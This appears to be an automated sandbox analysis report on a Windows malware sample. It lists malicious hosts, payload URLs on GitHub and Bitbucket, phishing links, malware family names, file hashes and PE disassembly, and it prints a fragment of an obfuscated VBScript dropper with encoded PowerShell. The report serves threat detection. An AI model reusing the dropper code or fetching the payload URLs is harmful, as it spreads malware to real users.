185.199.109.133 | gabe.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.109.133 | 5UIy3bo46y.dll | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.109.133 | HQsitBLlOv.dll | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.109.133 | steamcodegenerator.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.109.133 | OSLdZanXNc.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.109.133 | steamcodegenerator.exe | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.109.133 | SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
185.199.109.133 | SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
185.166.143.50 | fIPSLgT0lO.exe | malicious | Remcos |
185.166.143.50 | pPLwX9wSrD.exe | malicious | Remcos |
185.166.143.50 | ozfqy8Ms6t.exe | malicious | Unknown |
185.166.143.50 | 3XSXmrEOw7.exe | malicious | Unknown |
185.166.143.50 | pPLwX9wSrD.exe | malicious | Unknown |
185.166.143.50 | https://feji.us/m266he | malicious | Unknown |
185.166.143.50 | lLNOwu1HG4.js | malicious | RHADAMANTHYS |
185.166.143.50 | iVH355vnza.vbs | malicious | Unknown |
185.166.143.50 | 9QwZPBACyK.exe | malicious | Unknown |
185.166.143.50 | PQwHxAiBGt.exe | malicious | RHADAMANTHYS |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s3-w.us-east-1.amazonaws.com | https://eu.onamoc.comano.us/XaFJNdmNsY0JUVzZrd09aZnpEZk9LNXJHSFV1RTlrbFdPMXQ5dzRKTHV4dEdpUEhTM1I1MCszdjdWWm54V01kSEhOSlpOSFpjMUlsaFNTc0l3eXhVeWl3TGVjWm14bGMxUFkzWWFkVUQvbUlNMGEza0pnOFFCK3N4TDBlc3RyYWJkSE9xVU9ETG5TU1lHQkZwdStVdXhGMzdoQzltdFAwRnc0WTJuMmF3Q1VkTzdMb0lwNXhqOFQ3eGRtK0ZuQUpydjMxSWdnPT0tLUFPWFdqaFhtRnVKaEhNK20tLUlJNFZwQjNETFQyTk1iL0UxMUxBTGc9PQ==?cid=300477933 | malicious | KnowBe4 | 52.216.54.49
s3-w.us-east-1.amazonaws.com | https://login.corp-internal.org/17058d3d8656ed69?l=27 | malicious | Unknown | 52.216.58.145
s3-w.us-east-1.amazonaws.com | 18037.doc | malicious | Unknown | 52.216.144.19
s3-w.us-east-1.amazonaws.com | 4JwhvqLe8n.exe | malicious | Remcos | 3.5.24.44
s3-w.us-east-1.amazonaws.com | fIPSLgT0lO.exe | malicious | Remcos | 52.217.129.233
s3-w.us-east-1.amazonaws.com | 3XSXmrEOw7.exe | malicious | Remcos | 54.231.203.105
s3-w.us-east-1.amazonaws.com | ozfqy8Ms6t.exe | malicious | Remcos | 52.217.118.249
s3-w.us-east-1.amazonaws.com | pPLwX9wSrD.exe | malicious | Remcos | 54.231.193.17
s3-w.us-east-1.amazonaws.com | hCJ8gK9kNn.exe | malicious | Remcos | 3.5.25.23
s3-w.us-east-1.amazonaws.com | ozfqy8Ms6t.exe | malicious | Unknown | 3.5.29.178
raw.githubusercontent.com | LaRHzSijsq.exe | malicious | DCRat | 185.199.109.133
raw.githubusercontent.com | 3edTbzftGf.exe | malicious | Discord Token Stealer, DotStealer | 185.199.109.133
raw.githubusercontent.com | c56uoWlDXp.exe | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | gjvU5KOFhX.exe | malicious | Discord Token Stealer, Millenuim RAT | 185.199.110.133
raw.githubusercontent.com | svhost.vbs | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | hvqc3lk7ly.exe | malicious | Discord Token Stealer, DotStealer | 185.199.111.133
raw.githubusercontent.com | j87MOFviv4.lnk | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | DvGZE4FU02.lnk | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | j3z5kxxt52.lnk | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | zpbiw0htk6.lnk | malicious | Unknown | 185.199.110.133
bitbucket.org | 4JwhvqLe8n.exe | malicious | Remcos | 185.166.143.49
bitbucket.org | fIPSLgT0lO.exe | malicious | Remcos | 185.166.143.50
bitbucket.org | hoTwj68T1D.exe | malicious | Unknown | 185.166.143.49
bitbucket.org | 4JwhvqLe8n.exe | malicious | Unknown | 185.166.143.49
bitbucket.org | fIPSLgT0lO.exe | malicious | Unknown | 185.166.143.49
bitbucket.org | 3XSXmrEOw7.exe | malicious | Remcos | 185.166.143.48
bitbucket.org | ozfqy8Ms6t.exe | malicious | Remcos | 185.166.143.48
bitbucket.org | pPLwX9wSrD.exe | malicious | Remcos | 185.166.143.50
bitbucket.org | hCJ8gK9kNn.exe | malicious | Remcos | 185.166.143.49
bitbucket.org | x4fDy1muYs.exe | malicious | Unknown | 185.166.143.48
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02US | https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSL813n1NSUgoHlh-2FH8jVXE55TTo10JYMDP3MpP9biJ-2BivxRElKJfGcSf3Wm0bk6-2BuL6x9TaALAI-2BL1qw1Dee2Qg-3DwH82_lUpiXeYCZ5wahax4fkypnG65rENS0eHcuXkODr9BV8nkC0Nc6-2BAihSf0cmYNntTLO4SyowozBXe6Qe-2Bbp-2FFF3a1FIQOXuBqEKUpfXMQ5PPxSuhMxN-2FGKw6aVp7-2FrJaFsaK3MxWcXiB-2FQGWayulE8-2FtCvMhmv4KaADpZ-2B0qQmLVPxqh24uJt9FaNBQBIm1l70gJHtveQ3b-2FplaZ4NS9-2FFv9-2FcAZ4BnOdGLbd-2BNZzE9Ba47yxwqIyGzlJ-2BmDN57eM41CachqUTFf5upDlE1JEwIy6eZ7t9nvf-2Fc9lQV8qupSe0IpWj5cFkfBjNJ9myaj1i3KCzGOXUSk-2F4E-2FHX-2BkuwdmqzU7u2OKMrHZeEXOJLiSw-3D#C | malicious | Unknown | 108.158.75.84
AMAZON-02US | https://simatantincendi.weebly.com/ | malicious | HTMLPhisher | 44.235.253.37
AMAZON-02US | zmap.m68k.elf | malicious | Mirai, Okiru | 54.171.230.55
AMAZON-02US | zmap.arm5.elf | malicious | Okiru | 54.171.230.55
AMAZON-02US | REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | 18.141.10.107
AMAZON-02US | https://eu.onamoc.comano.us/XaFJNdmNsY0JUVzZrd09aZnpEZk9LNXJHSFV1RTlrbFdPMXQ5dzRKTHV4dEdpUEhTM1I1MCszdjdWWm54V01kSEhOSlpOSFpjMUlsaFNTc0l3eXhVeWl3TGVjWm14bGMxUFkzWWFkVUQvbUlNMGEza0pnOFFCK3N4TDBlc3RyYWJkSE9xVU9ETG5TU1lHQkZwdStVdXhGMzdoQzltdFAwRnc0WTJuMmF3Q1VkTzdMb0lwNXhqOFQ3eGRtK0ZuQUpydjMxSWdnPT0tLUFPWFdqaFhtRnVKaEhNK20tLUlJNFZwQjNETFQyTk1iL0UxMUxBTGc9PQ==?cid=300477933 | malicious | KnowBe4 | 13.227.8.37
AMAZON-02US | https://login.corp-internal.org/17058d3d8656ed69?l=27 | malicious | Unknown | 52.216.58.145
AMAZON-02US | main_sh4.elf | malicious | Mirai | 54.171.230.55
AMAZON-02US | main_mips.elf | malicious | Mirai | 54.171.230.55
AMAZON-02US | mpsl.elf | malicious | Mirai | 54.171.141.187
FASTLYUS | https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSL813n1NSUgoHlh-2FH8jVXE55TTo10JYMDP3MpP9biJ-2BivxRElKJfGcSf3Wm0bk6-2BuL6x9TaALAI-2BL1qw1Dee2Qg-3DwH82_lUpiXeYCZ5wahax4fkypnG65rENS0eHcuXkODr9BV8nkC0Nc6-2BAihSf0cmYNntTLO4SyowozBXe6Qe-2Bbp-2FFF3a1FIQOXuBqEKUpfXMQ5PPxSuhMxN-2FGKw6aVp7-2FrJaFsaK3MxWcXiB-2FQGWayulE8-2FtCvMhmv4KaADpZ-2B0qQmLVPxqh24uJt9FaNBQBIm1l70gJHtveQ3b-2FplaZ4NS9-2FFv9-2FcAZ4BnOdGLbd-2BNZzE9Ba47yxwqIyGzlJ-2BmDN57eM41CachqUTFf5upDlE1JEwIy6eZ7t9nvf-2Fc9lQV8qupSe0IpWj5cFkfBjNJ9myaj1i3KCzGOXUSk-2F4E-2FHX-2BkuwdmqzU7u2OKMrHZeEXOJLiSw-3D#C | malicious | Unknown | 151.101.2.137
FASTLYUS | https://simatantincendi.weebly.com/ | malicious | HTMLPhisher |
                                                                                                      • 151.101.2.137
                                                                                                      https://business.livechathelpsuite.comGet hashmaliciousUnknownBrowse
                                                                                                      • 151.101.66.137
                                                                                                      fNlxQP0jBz.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 151.101.129.91
                                                                                                      LbgqLv7gT7.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 151.101.65.91
                                                                                                      fNlxQP0jBz.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 151.101.65.91
                                                                                                      LbgqLv7gT7.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 151.101.129.91
                                                                                                      https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                                                                                                      • 151.101.194.137
                                                                                                      https://protect.checkpoint.com/v2/r02/___https://url1251.popmenu.com/qxdhqnhp?zus=z556.WRHPCjsgt/tA51B6LI9w4BubTYwM5p/-7KrggkVEpmPU5/oVFKKM8Rk6rAnqtQtILc2Q2H_3u9DiXC41Sfynx8MyN*~*gGwOol/aO3BY*~*pgD37kbc4-7KGmCSO4DHGqcB*~*D2S053knP-7G*~*y37ScDgrX/lhFDF7r7h5Gwz-7GtvZLu*~*h33zX5RXwSF0oDJX34CSZAvVXm4AFQJ-7Gq-7KxI/mcm4qvQmbxushMLQI9uHWfHKaPI5mifSCu5iVBRcvqUxu7JB4CzzH*~*tp7hI*~*P2JxcRqKbjQDa1m4EV2vJju-7KXGYhKkA/NMg4b3nlprWADF7NLfLtJTf5xKVlxz1PBE*~*XIwKJANjSZxzJHsTEzwI07xTpBPmh9cjRp3bNxF-8I___.YzJlOm1zbm90aWZ5OmM6bzphNDQ0NjUwYTgwNjk4YzE1YzQzODY0NjgzZWZkNGFjNzo3Ojk1N2U6NjEyMTFiMTNiOTljZDFhYmUzOWRiNzM5NDE0NGE3NDNhMDJkZjlhMmI1NzgzMzhlZTAwMjhmZTBkODVlNWNmZDpoOlQ6VAGet hashmaliciousUnknownBrowse
                                                                                                      • 151.101.130.137
                                                                                                      https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                                                                                                      • 151.101.2.137
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context

Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name
https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSL813n1NSUgoHlh-2FH8jVXE55TTo10JYMDP3MpP9biJ-2BivxRElKJfGcSf3Wm0bk6-2BuL6x9TaALAI-2BL1qw1Dee2Qg-3DwH82_lUpiXeYCZ5wahax4fkypnG65rENS0eHcuXkODr9BV8nkC0Nc6-2BAihSf0cmYNntTLO4SyowozBXe6Qe-2Bbp-2FFF3a1FIQOXuBqEKUpfXMQ5PPxSuhMxN-2FGKw6aVp7-2FrJaFsaK3MxWcXiB-2FQGWayulE8-2FtCvMhmv4KaADpZ-2B0qQmLVPxqh24uJt9FaNBQBIm1l70gJHtveQ3b-2FplaZ4NS9-2FFv9-2FcAZ4BnOdGLbd-2BNZzE9Ba47yxwqIyGzlJ-2BmDN57eM41CachqUTFf5upDlE1JEwIy6eZ7t9nvf-2Fc9lQV8qupSe0IpWj5cFkfBjNJ9myaj1i3KCzGOXUSk-2F4E-2FHX-2BkuwdmqzU7u2OKMrHZeEXOJLiSw-3D#C | malicious | Unknown
  • 185.166.143.50
  • 185.199.109.133
InvoiceNr274728.pdf.lnk | malicious | LummaC
  • 185.166.143.50
  • 185.199.109.133
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
  • 185.166.143.50
  • 185.199.109.133
QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT
  • 185.166.143.50
  • 185.199.109.133
FT876567090.exe | malicious | Snake Keylogger, VIP Keylogger
  • 185.166.143.50
  • 185.199.109.133
#U00d6deme tavsiyesi.pdf.exe | malicious | Unknown
  • 185.166.143.50
  • 185.199.109.133
KASHI SHIP PARTICULARS.pdf.scr.exe | malicious | AgentTesla
  • 185.166.143.50
  • 185.199.109.133
REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT
  • 185.166.143.50
  • 185.199.109.133
#U00d6deme tavsiyesi.pdf.exe | malicious | Unknown
  • 185.166.143.50
  • 185.199.109.133
PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | malicious | VIP Keylogger
  • 185.166.143.50
  • 185.199.109.133

No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 9434
Entropy (8bit): 4.928515784730612
Encrypted: false
SSDEEP: 192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5: D3594118838EF8580975DDA877E44DEB
SHA1: 0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256: 456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512: 103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulL4w/l/lZ:NllUMwl/
MD5: 5E4245540CA0496B6A4E15149DB9B371
SHA1: 6F912443CDFD9F0C474E2ACC755E982C5E3CF8BB
SHA-256: 6892D98C8FEF52384104FB8712A0E1DA43C1B5CA8E7E32CF33200354E2FBC522
SHA-512: 1E61844BED5A7A30C6DE358CC6E351FFE6F783F27B5FAC2C4E71C2F9047D84C396C91E2B3264F043D03C41AAB179C7ADD3408AD68C966C1299827363DC3AF4B0
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e................................................@..........

Process: C:\Users\user\Desktop\GdGXG0bnxH.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 15808
Entropy (8bit): 5.420171671036689
Encrypted: false
SSDEEP: 192:BW151SRHLqMabD7HDDZojDY05wH0UvYHtcCjc7NF9Wu0MDxpnO/9pOKg:s1GubvHXcE05wUnqNv10MFpWpOZ
MD5: E2EE2212DAC9B42877E1371557B6C336
SHA1: 5CE46091ED91A51514F49361451E900B708D52A6
SHA-256: 2003C2D87C5641063FAF9402288CCD5AFDE73723C3BAA114F05DABB692EF603C
SHA-512: 4867E92A35DC7C17B9D814B06D0E61ED451A4ADC9B44839ED8DB9D3CD4A695F6CCC59B0497002F66FC2D0AFB87E6DF0F1FBDFA95D8B8CADDEDAEF6237ACD6D8A
Malicious: false
Preview: 'g..pbdbgpnodcA = rRegisggfgdsadfkjhgjg211 & ""..Call Ugsfisging("$so" & "digo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$D")..Call Ugsfisging("o$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQB")..kaahgdmc = TimeSerial(7,7,9)..Public Const neIjImodj = "krdkmmS"..chbjepih = "hffhfg" & LenB("Imaangod") & "hfg"..'kaAmpmm gkrabemi..pmaeSccA = TimeSerial(8,8,7)..Public Const Fdkpgmo = "ocbokkF"..kifdISkoh = "hffhfg" & LenB("dgcjmncpb") & "hfg"..'ibbadefd FdASodrr..Call Ugsfisging("y$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$")..mkAdhckhm = TimeSerial(9,7,9)..Public Const gidbbba = "knhodpebo"..Sbhkhnkjk = "hffhfg" & LenB("kmdmIfprn") & "hfg"..'mmbrdbF nbmcFfm..Fohbdkd = TimeSerial(8,7,7)..Public Const IFrjifm = "AdbScbhem"..fffIdkSg = "hffhfg" & LenB("IkhgAjek") & "hfg"..'aicAigkmb ogjdddek..Call Ugsfisging("N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bg")..Call Ugsfisging("Bs$G8$Y

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 6.853102909659854
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: GdGXG0bnxH.exe
File size: 163'840 bytes
MD5: 8970eef61ba5b0d180b01242796bad53
SHA1: b321407f1f5ce589c99060e413e8edd676f4301c
SHA256: 14fc6009715e1f4627e3fd9cefb81c27d55f766a210c651b6a0491b075f46189
SHA512: 1da4273083518e8c870aebcbf0dda55defce12effbd7485bd36dc04075fc7d9fbe66b548b41e2328a7055be0921750537e5e84c841b0219ff9535d16f35a888e
SSDEEP: 3072:VahKyd2n31t5GWp1icKAArDZz4N9GhbkrNEk1rkhE1T:VahOBp0yN90QEOkyN
TLSH: B8F38C0A63E420A6E4BA577498F302935A31BCB15B7892FF23C5D57E1E236D0A532F17
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."
Icon Hash: 3b6120282c4c5a1f
Entrypoint: 0x140008200
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
TLS Callbacks:
CLR (.Net) Version:
                                                                                                      OS Version Major:10
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:10
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:10
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
Instruction
dec eax
sub esp, 28h
call 00007F8AF51EEA80h
dec eax
add esp, 28h
jmp 00007F8AF51EE32Bh
int3
int3
int3
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], edi
inc ecx
push esi
dec eax
sub esp, 000000B0h
and dword ptr [esp+20h], 00000000h
dec eax
lea ecx, dword ptr [esp+40h]
call dword ptr [000011CDh]
nop
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ebx, dword ptr [eax+08h]
xor edi, edi
xor eax, eax
dec eax
cmpxchg dword ptr [00004922h], ebx
je 00007F8AF51EE32Ch
dec eax
cmp eax, ebx
jne 00007F8AF51EE33Ch
mov edi, 00000001h
mov eax, dword ptr [00004918h]
cmp eax, 01h
jne 00007F8AF51EE339h
lea ecx, dword ptr [eax+1Eh]
call 00007F8AF51EE913h
jmp 00007F8AF51EE39Ch
mov ecx, 000003E8h
call dword ptr [0000117Eh]
jmp 00007F8AF51EE2E9h
mov eax, dword ptr [000048F6h]
test eax, eax
jne 00007F8AF51EE37Bh
mov dword ptr [000048E8h], 00000001h
dec esp
lea esi, dword ptr [000013E9h]
dec eax
lea ebx, dword ptr [000013CAh]
dec eax
mov dword ptr [esp+30h], ebx
mov dword ptr [esp+24h], eax
dec ecx
cmp ebx, esi
jnc 00007F8AF51EE347h
test eax, eax
jne 00007F8AF51EE347h
dec eax
cmp dword ptr [ebx], 00000000h
je 00007F8AF51EE332h
dec eax
mov eax, dword ptr [ebx]
dec eax
mov ecx, dword ptr [00001388h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa23c | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x1ce54 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x408 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c000 | 0x20 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a10 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9128 | 0x520 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7b80 | 0x7c00 | 60800deac1fde21b98089f2241ee6168 | False | 0.5499936995967742 | data | 6.096261782871538 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x22c8 | 0x2400 | 59d15cdf89780817c3d48dd588a6a129 | False | 0.4136284722222222 | data | 4.727841929207054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x1f00 | 0x400 | 9d1580dccaf8e787a43caf4bba48a079 | False | 0.3212890625 | data | 3.1889769845125677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xe000 | 0x408 | 0x600 | 15cd12257317071f28e4f7b728f8825e | False | 0.3932291666666667 | data | 3.1563665040475675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xf000 | 0x1d000 | 0x1d000 | f9285d793255b19603f1fb043f493701 | False | 0.7388452990301724 | data | 7.0506300064705325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2c000 | 0x20 | 0x200 | 637787151ee546a94902de9694a58fd6 | False | 0.083984375 | data | 0.4068473715812382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AVI | 0xf9f8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States | 0.2713099474665311
RT_ICON | 0x12814 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3225609756097561
RT_ICON | 0x12e7c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.41263440860215056
RT_ICON | 0x13164 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4569672131147541
RT_ICON | 0x1334c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325
RT_ICON | 0x13474 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6223347547974414
RT_ICON | 0x1431c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7369133574007221
RT_ICON | 0x14bc4 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.783410138248848
RT_ICON | 0x1528c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3829479768786127
RT_ICON | 0x157f4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004662673505254
RT_ICON | 0x231c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672
RT_ICON | 0x25770 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205
RT_ICON | 0x26818 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.703688524590164
RT_ICON | 0x271a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.425531914893617
RT_DIALOG | 0x27608 | 0x2f2 | data | English | United States | 0.4389920424403183
RT_DIALOG | 0x278fc | 0x1b0 | data | English | United States | 0.5625
RT_DIALOG | 0x27aac | 0x166 | data | English | United States | 0.5223463687150838
RT_DIALOG | 0x27c14 | 0x1c0 | data | English | United States | 0.5446428571428571
RT_DIALOG | 0x27dd4 | 0x130 | data | English | United States | 0.5526315789473685
RT_DIALOG | 0x27f04 | 0x120 | data | English | United States | 0.5763888888888888
RT_STRING | 0x28024 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States | 0.6214285714285714
RT_STRING | 0x280b0 | 0x520 | data | English | United States | 0.4032012195121951
RT_STRING | 0x285d0 | 0x5cc | data | English | United States | 0.36455525606469
RT_STRING | 0x28b9c | 0x4b0 | data | English | United States | 0.385
RT_STRING | 0x2904c | 0x44a | data | English | United States | 0.3970856102003643
RT_STRING | 0x29498 | 0x3ce | data | English | United States | 0.36858316221765913
RT_RCDATA | 0x29868 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x29870 | 0x18b8 | Microsoft Cabinet archive data, Windows 2000/XP setup, 6328 bytes, 1 file, at 0x2c +A "675c87f6bfee1.vbs", ID 1356, number 1, 1 datablock, 0x1503 compression | English | United States | 1.0017383059418459
RT_RCDATA | 0x2b128 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b12c | 0x24 | GLS_BINARY_LSB_FIRST | English | United States | 0.6666666666666666
RT_RCDATA | 0x2b150 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2b158 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2b160 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b164 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2b16c | 0x4 | data | English | United States | 3.0
